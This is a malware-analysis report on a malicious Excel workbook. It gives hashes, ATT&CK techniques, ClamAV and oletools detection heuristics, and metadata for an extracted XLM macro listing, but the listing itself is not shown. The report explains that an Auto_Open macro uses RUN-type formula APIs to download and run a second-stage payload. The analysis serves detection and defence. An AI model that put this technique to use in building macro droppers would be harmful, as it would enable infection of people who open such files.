Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d035655c7ad2053e…

MALICIOUS

Office (OLE)

Size: 182.5 KB
Created: 2020-05-11 08:09:52
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: d85a001823de7b0ab87f79442c48d630
SHA-1: b0af25be6115429d7281bb6045375335377dcab7
SHA-256: d035655c7ad2053e01020e5561fcb1ebe2fc416fc7888d9c595fea48c815e88c
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The file contains Excel 4.0 (XLM) macros, specifically an Auto_Open macro, a known technique for executing code automatically when the workbook is opened. Heuristics indicate the use of dangerous formula APIs such as RUN, suggesting the macro is designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics (4)

  • ClamAV: Xls.Dropper.Agent-7790690-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-7790690-0
  • Excel 4.0 Auto_Open defined name [critical] (OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] (OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 126577 bytes
SHA-256: f5bb920c0340c4b869881a031442b7a920d19e19ccf85de3ace4354e5ce0df60
Preview script
First 1,000 lines of the extracted script